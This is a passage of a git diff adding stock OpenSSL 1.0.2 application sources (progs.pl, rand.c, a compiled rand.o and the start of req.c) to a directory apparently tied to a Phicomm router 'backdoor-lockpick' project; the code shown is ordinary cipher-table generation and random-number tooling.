+#ifndef OPENSSL_NO_MDC2
+	{FUNC_TYPE_MD,"mdc2",dgst_main},
+#endif
+#ifndef OPENSSL_NO_RMD160
+	{FUNC_TYPE_MD,"rmd160",dgst_main},
+#endif
+#ifndef OPENSSL_NO_AES
+	{FUNC_TYPE_CIPHER,"aes-128-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_AES
+	{FUNC_TYPE_CIPHER,"aes-128-ecb",enc_main},
+#endif
+#ifndef OPENSSL_NO_AES
+	{FUNC_TYPE_CIPHER,"aes-192-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_AES
+	{FUNC_TYPE_CIPHER,"aes-192-ecb",enc_main},
+#endif
+#ifndef OPENSSL_NO_AES
+	{FUNC_TYPE_CIPHER,"aes-256-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_AES
+	{FUNC_TYPE_CIPHER,"aes-256-ecb",enc_main},
+#endif
+#ifndef OPENSSL_NO_CAMELLIA
+	{FUNC_TYPE_CIPHER,"camellia-128-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_CAMELLIA
+	{FUNC_TYPE_CIPHER,"camellia-128-ecb",enc_main},
+#endif
+#ifndef OPENSSL_NO_CAMELLIA
+	{FUNC_TYPE_CIPHER,"camellia-192-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_CAMELLIA
+	{FUNC_TYPE_CIPHER,"camellia-192-ecb",enc_main},
+#endif
+#ifndef OPENSSL_NO_CAMELLIA
+	{FUNC_TYPE_CIPHER,"camellia-256-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_CAMELLIA
+	{FUNC_TYPE_CIPHER,"camellia-256-ecb",enc_main},
+#endif
+	{FUNC_TYPE_CIPHER,"base64",enc_main},
+#ifdef ZLIB
+	{FUNC_TYPE_CIPHER,"zlib",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des3",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"desx",enc_main},
+#endif
+#ifndef OPENSSL_NO_IDEA
+	{FUNC_TYPE_CIPHER,"idea",enc_main},
+#endif
+#ifndef OPENSSL_NO_SEED
+	{FUNC_TYPE_CIPHER,"seed",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC4
+	{FUNC_TYPE_CIPHER,"rc4",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC4
+	{FUNC_TYPE_CIPHER,"rc4-40",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC2
+	{FUNC_TYPE_CIPHER,"rc2",enc_main},
+#endif
+#ifndef OPENSSL_NO_BF
+	{FUNC_TYPE_CIPHER,"bf",enc_main},
+#endif
+#ifndef OPENSSL_NO_CAST
+	{FUNC_TYPE_CIPHER,"cast",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC5
+	{FUNC_TYPE_CIPHER,"rc5",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des-ecb",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des-ede",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des-ede3",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des-ede-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des-ede3-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des-cfb",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des-ede-cfb",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des-ede3-cfb",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des-ofb",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des-ede-ofb",enc_main},
+#endif
+#ifndef OPENSSL_NO_DES
+	{FUNC_TYPE_CIPHER,"des-ede3-ofb",enc_main},
+#endif
+#ifndef OPENSSL_NO_IDEA
+	{FUNC_TYPE_CIPHER,"idea-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_IDEA
+	{FUNC_TYPE_CIPHER,"idea-ecb",enc_main},
+#endif
+#ifndef OPENSSL_NO_IDEA
+	{FUNC_TYPE_CIPHER,"idea-cfb",enc_main},
+#endif
+#ifndef OPENSSL_NO_IDEA
+	{FUNC_TYPE_CIPHER,"idea-ofb",enc_main},
+#endif
+#ifndef OPENSSL_NO_SEED
+	{FUNC_TYPE_CIPHER,"seed-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_SEED
+	{FUNC_TYPE_CIPHER,"seed-ecb",enc_main},
+#endif
+#ifndef OPENSSL_NO_SEED
+	{FUNC_TYPE_CIPHER,"seed-cfb",enc_main},
+#endif
+#ifndef OPENSSL_NO_SEED
+	{FUNC_TYPE_CIPHER,"seed-ofb",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC2
+	{FUNC_TYPE_CIPHER,"rc2-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC2
+	{FUNC_TYPE_CIPHER,"rc2-ecb",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC2
+	{FUNC_TYPE_CIPHER,"rc2-cfb",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC2
+	{FUNC_TYPE_CIPHER,"rc2-ofb",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC2
+	{FUNC_TYPE_CIPHER,"rc2-64-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC2
+	{FUNC_TYPE_CIPHER,"rc2-40-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_BF
+	{FUNC_TYPE_CIPHER,"bf-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_BF
+	{FUNC_TYPE_CIPHER,"bf-ecb",enc_main},
+#endif
+#ifndef OPENSSL_NO_BF
+	{FUNC_TYPE_CIPHER,"bf-cfb",enc_main},
+#endif
+#ifndef OPENSSL_NO_BF
+	{FUNC_TYPE_CIPHER,"bf-ofb",enc_main},
+#endif
+#ifndef OPENSSL_NO_CAST
+	{FUNC_TYPE_CIPHER,"cast5-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_CAST
+	{FUNC_TYPE_CIPHER,"cast5-ecb",enc_main},
+#endif
+#ifndef OPENSSL_NO_CAST
+	{FUNC_TYPE_CIPHER,"cast5-cfb",enc_main},
+#endif
+#ifndef OPENSSL_NO_CAST
+	{FUNC_TYPE_CIPHER,"cast5-ofb",enc_main},
+#endif
+#ifndef OPENSSL_NO_CAST
+	{FUNC_TYPE_CIPHER,"cast-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC5
+	{FUNC_TYPE_CIPHER,"rc5-cbc",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC5
+	{FUNC_TYPE_CIPHER,"rc5-ecb",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC5
+	{FUNC_TYPE_CIPHER,"rc5-cfb",enc_main},
+#endif
+#ifndef OPENSSL_NO_RC5
+	{FUNC_TYPE_CIPHER,"rc5-ofb",enc_main},
+#endif
+	{0,NULL,NULL}
+	};
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/progs.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/progs.pl
new file mode 100644
index 0000000..fa6258c
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/progs.pl
@@ -0,0 +1,104 @@
+#!/usr/local/bin/perl
+
+print "/* apps/progs.h */\n";
+print "/* automatically generated by progs.pl for openssl.c */\n\n";
+
+grep(s/^asn1pars$/asn1parse/,@ARGV);
+
+foreach (@ARGV)
+	{ printf "extern int %s_main(int argc,char *argv[]);\n",$_; }
+
+print <<'EOF';
+
+#define FUNC_TYPE_GENERAL	1
+#define FUNC_TYPE_MD		2
+#define FUNC_TYPE_CIPHER	3
+#define FUNC_TYPE_PKEY		4
+#define FUNC_TYPE_MD_ALG	5
+#define FUNC_TYPE_CIPHER_ALG	6
+
+typedef struct {
+	int type;
+	const char *name;
+	int (*func)(int argc,char *argv[]);
+	} FUNCTION;
+DECLARE_LHASH_OF(FUNCTION);
+
+FUNCTION functions[] = {
+EOF
+
+foreach (@ARGV)
+	{
+	push(@files,$_);
+	$str="\t{FUNC_TYPE_GENERAL,\"$_\",${_}_main},\n";
+	if (($_ =~ /^s_/) || ($_ =~ /^ciphers$/))
+		{ print "#if !defined(OPENSSL_NO_SOCK)\n${str}#endif\n"; } 
+	elsif ( ($_ =~ /^speed$/))
+		{ print "#ifndef OPENSSL_NO_SPEED\n${str}#endif\n"; }
+	elsif ( ($_ =~ /^engine$/))
+		{ print "#ifndef OPENSSL_NO_ENGINE\n${str}#endif\n"; }
+	elsif ( ($_ =~ /^rsa$/) || ($_ =~ /^genrsa$/) || ($_ =~ /^rsautl$/)) 
+		{ print "#ifndef OPENSSL_NO_RSA\n${str}#endif\n";  }
+	elsif ( ($_ =~ /^dsa$/) || ($_ =~ /^gendsa$/) || ($_ =~ /^dsaparam$/))
+		{ print "#ifndef OPENSSL_NO_DSA\n${str}#endif\n"; }
+	elsif ( ($_ =~ /^ec$/) || ($_ =~ /^ecparam$/))
+		{ print "#ifndef OPENSSL_NO_EC\n${str}#endif\n";}
+	elsif ( ($_ =~ /^dh$/) || ($_ =~ /^gendh$/) || ($_ =~ /^dhparam$/))
+		{ print "#ifndef OPENSSL_NO_DH\n${str}#endif\n"; }
+	elsif ( ($_ =~ /^pkcs12$/))
+		{ print "#if !defined(OPENSSL_NO_DES) && !defined(OPENSSL_NO_SHA1)\n${str}#endif\n"; }
+	elsif ( ($_ =~ /^cms$/))
+		{ print "#ifndef OPENSSL_NO_CMS\n${str}#endif\n"; }
+	elsif ( ($_ =~ /^ocsp$/))
+		{ print "#ifndef OPENSSL_NO_OCSP\n${str}#endif\n"; }
+	elsif ( ($_ =~ /^srp$/))
+		{ print "#ifndef OPENSSL_NO_SRP\n${str}#endif\n"; }
+	else
+		{ print $str; }
+	}
+
+foreach ("md2","md4","md5","sha","sha1","mdc2","rmd160")
+	{
+	push(@files,$_);
+	printf "#ifndef OPENSSL_NO_".uc($_)."\n\t{FUNC_TYPE_MD,\"".$_."\",dgst_main},\n#endif\n";
+	}
+
+foreach (
+	"aes-128-cbc", "aes-128-ecb",
+	"aes-192-cbc", "aes-192-ecb",
+	"aes-256-cbc", "aes-256-ecb",
+	"camellia-128-cbc", "camellia-128-ecb",
+	"camellia-192-cbc", "camellia-192-ecb",
+	"camellia-256-cbc", "camellia-256-ecb",
+	"base64", "zlib",
+	"des", "des3", "desx", "idea", "seed", "rc4", "rc4-40",
+	"rc2", "bf", "cast", "rc5",
+	"des-ecb", "des-ede",    "des-ede3",
+	"des-cbc", "des-ede-cbc","des-ede3-cbc",
+	"des-cfb", "des-ede-cfb","des-ede3-cfb",
+	"des-ofb", "des-ede-ofb","des-ede3-ofb",
+	"idea-cbc","idea-ecb",    "idea-cfb", "idea-ofb",
+	"seed-cbc","seed-ecb",    "seed-cfb", "seed-ofb",
+	"rc2-cbc", "rc2-ecb", "rc2-cfb","rc2-ofb", "rc2-64-cbc", "rc2-40-cbc",
+	"bf-cbc",  "bf-ecb",     "bf-cfb",   "bf-ofb",
+	"cast5-cbc","cast5-ecb", "cast5-cfb","cast5-ofb",
+	"cast-cbc", "rc5-cbc",   "rc5-ecb",  "rc5-cfb",  "rc5-ofb")
+	{
+	push(@files,$_);
+
+	$t=sprintf("\t{FUNC_TYPE_CIPHER,\"%s\",enc_main},\n",$_);
+	if    ($_ =~ /des/)  { $t="#ifndef OPENSSL_NO_DES\n${t}#endif\n"; }
+	elsif ($_ =~ /aes/)  { $t="#ifndef OPENSSL_NO_AES\n${t}#endif\n"; }
+	elsif ($_ =~ /camellia/)  { $t="#ifndef OPENSSL_NO_CAMELLIA\n${t}#endif\n"; }
+	elsif ($_ =~ /idea/) { $t="#ifndef OPENSSL_NO_IDEA\n${t}#endif\n"; }
+	elsif ($_ =~ /seed/) { $t="#ifndef OPENSSL_NO_SEED\n${t}#endif\n"; }
+	elsif ($_ =~ /rc4/)  { $t="#ifndef OPENSSL_NO_RC4\n${t}#endif\n"; }
+	elsif ($_ =~ /rc2/)  { $t="#ifndef OPENSSL_NO_RC2\n${t}#endif\n"; }
+	elsif ($_ =~ /bf/)   { $t="#ifndef OPENSSL_NO_BF\n${t}#endif\n"; }
+	elsif ($_ =~ /cast/) { $t="#ifndef OPENSSL_NO_CAST\n${t}#endif\n"; }
+	elsif ($_ =~ /rc5/)  { $t="#ifndef OPENSSL_NO_RC5\n${t}#endif\n"; }
+	elsif ($_ =~ /zlib/)  { $t="#ifdef ZLIB\n${t}#endif\n"; }
+	print $t;
+	}
+
+print "\t{0,NULL,NULL}\n\t};\n";
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rand.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rand.c
new file mode 100644
index 0000000..e159da3
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rand.c
@@ -0,0 +1,229 @@
+/* apps/rand.c */
+/* ====================================================================
+ * Copyright (c) 1998-2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "apps.h"
+
+#include <ctype.h>
+#include <stdio.h>
+#include <string.h>
+
+#include <openssl/bio.h>
+#include <openssl/err.h>
+#include <openssl/rand.h>
+
+#undef PROG
+#define PROG rand_main
+
+/*-
+ * -out file         - write to file
+ * -rand file:file   - PRNG seed files
+ * -base64           - base64 encode output
+ * -hex              - hex encode output
+ * num               - write 'num' bytes
+ */
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    int i, r, ret = 1;
+    int badopt;
+    char *outfile = NULL;
+    char *inrand = NULL;
+    int base64 = 0;
+    int hex = 0;
+    BIO *out = NULL;
+    int num = -1;
+#ifndef OPENSSL_NO_ENGINE
+    char *engine = NULL;
+#endif
+
+    apps_startup();
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto err;
+
+    badopt = 0;
+    i = 0;
+    while (!badopt && argv[++i] != NULL) {
+        if (strcmp(argv[i], "-out") == 0) {
+            if ((argv[i + 1] != NULL) && (outfile == NULL))
+                outfile = argv[++i];
+            else
+                badopt = 1;
+        }
+#ifndef OPENSSL_NO_ENGINE
+        else if (strcmp(argv[i], "-engine") == 0) {
+            if ((argv[i + 1] != NULL) && (engine == NULL))
+                engine = argv[++i];
+            else
+                badopt = 1;
+        }
+#endif
+        else if (strcmp(argv[i], "-rand") == 0) {
+            if ((argv[i + 1] != NULL) && (inrand == NULL))
+                inrand = argv[++i];
+            else
+                badopt = 1;
+        } else if (strcmp(argv[i], "-base64") == 0) {
+            if (!base64)
+                base64 = 1;
+            else
+                badopt = 1;
+        } else if (strcmp(argv[i], "-hex") == 0) {
+            if (!hex)
+                hex = 1;
+            else
+                badopt = 1;
+        } else if (isdigit((unsigned char)argv[i][0])) {
+            if (num < 0) {
+                r = sscanf(argv[i], "%d", &num);
+                if (r == 0 || num < 0)
+                    badopt = 1;
+            } else
+                badopt = 1;
+        } else
+            badopt = 1;
+    }
+
+    if (hex && base64)
+        badopt = 1;
+
+    if (num < 0)
+        badopt = 1;
+
+    if (badopt) {
+        BIO_printf(bio_err, "Usage: rand [options] num\n");
+        BIO_printf(bio_err, "where options are\n");
+        BIO_printf(bio_err, "-out file             - write to file\n");
+#ifndef OPENSSL_NO_ENGINE
+        BIO_printf(bio_err,
+                   "-engine e             - use engine e, possibly a hardware device.\n");
+#endif
+        BIO_printf(bio_err, "-rand file%cfile%c... - seed PRNG from files\n",
+                   LIST_SEPARATOR_CHAR, LIST_SEPARATOR_CHAR);
+        BIO_printf(bio_err, "-base64               - base64 encode output\n");
+        BIO_printf(bio_err, "-hex                  - hex encode output\n");
+        goto err;
+    }
+#ifndef OPENSSL_NO_ENGINE
+    setup_engine(bio_err, engine, 0);
+#endif
+
+    app_RAND_load_file(NULL, bio_err, (inrand != NULL));
+    if (inrand != NULL)
+        BIO_printf(bio_err, "%ld semi-random bytes loaded\n",
+                   app_RAND_load_files(inrand));
+
+    out = BIO_new(BIO_s_file());
+    if (out == NULL)
+        goto err;
+    if (outfile != NULL)
+        r = BIO_write_filename(out, outfile);
+    else {
+        r = BIO_set_fp(out, stdout, BIO_NOCLOSE | BIO_FP_TEXT);
+#ifdef OPENSSL_SYS_VMS
+        {
+            BIO *tmpbio = BIO_new(BIO_f_linebuffer());
+            out = BIO_push(tmpbio, out);
+        }
+#endif
+    }
+    if (r <= 0)
+        goto err;
+
+    if (base64) {
+        BIO *b64 = BIO_new(BIO_f_base64());
+        if (b64 == NULL)
+            goto err;
+        out = BIO_push(b64, out);
+    }
+
+    while (num > 0) {
+        unsigned char buf[4096];
+        int chunk;
+
+        chunk = num;
+        if (chunk > (int)sizeof(buf))
+            chunk = sizeof buf;
+        r = RAND_bytes(buf, chunk);
+        if (r <= 0)
+            goto err;
+        if (!hex)
+            BIO_write(out, buf, chunk);
+        else {
+            for (i = 0; i < chunk; i++)
+                BIO_printf(out, "%02x", buf[i]);
+        }
+        num -= chunk;
+    }
+    if (hex)
+        BIO_puts(out, "\n");
+    (void)BIO_flush(out);
+
+    app_RAND_write_file(NULL, bio_err);
+    ret = 0;
+
+ err:
+    ERR_print_errors(bio_err);
+    if (out)
+        BIO_free_all(out);
+    apps_shutdown();
+    OPENSSL_EXIT(ret);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rand.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/rand.o
new file mode 100644
index 0000000000000000000000000000000000000000..ecfcf92bf612059f1750066f4a930c138cde3535
GIT binary patch
literal 5680
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
Ydv2Jg%5aaX7atYl|1x)3%e?Xb1tC+A9RL6T

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/req.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/req.c
new file mode 100644
index 0000000..57781c9
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/req.c
@@ -0,0 +1,1732 @@
+/* apps/req.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+/*
+ * Until the key-gen callbacks are modified to use newer prototypes, we allow
+ * deprecated functions for openssl-internal code
+ */
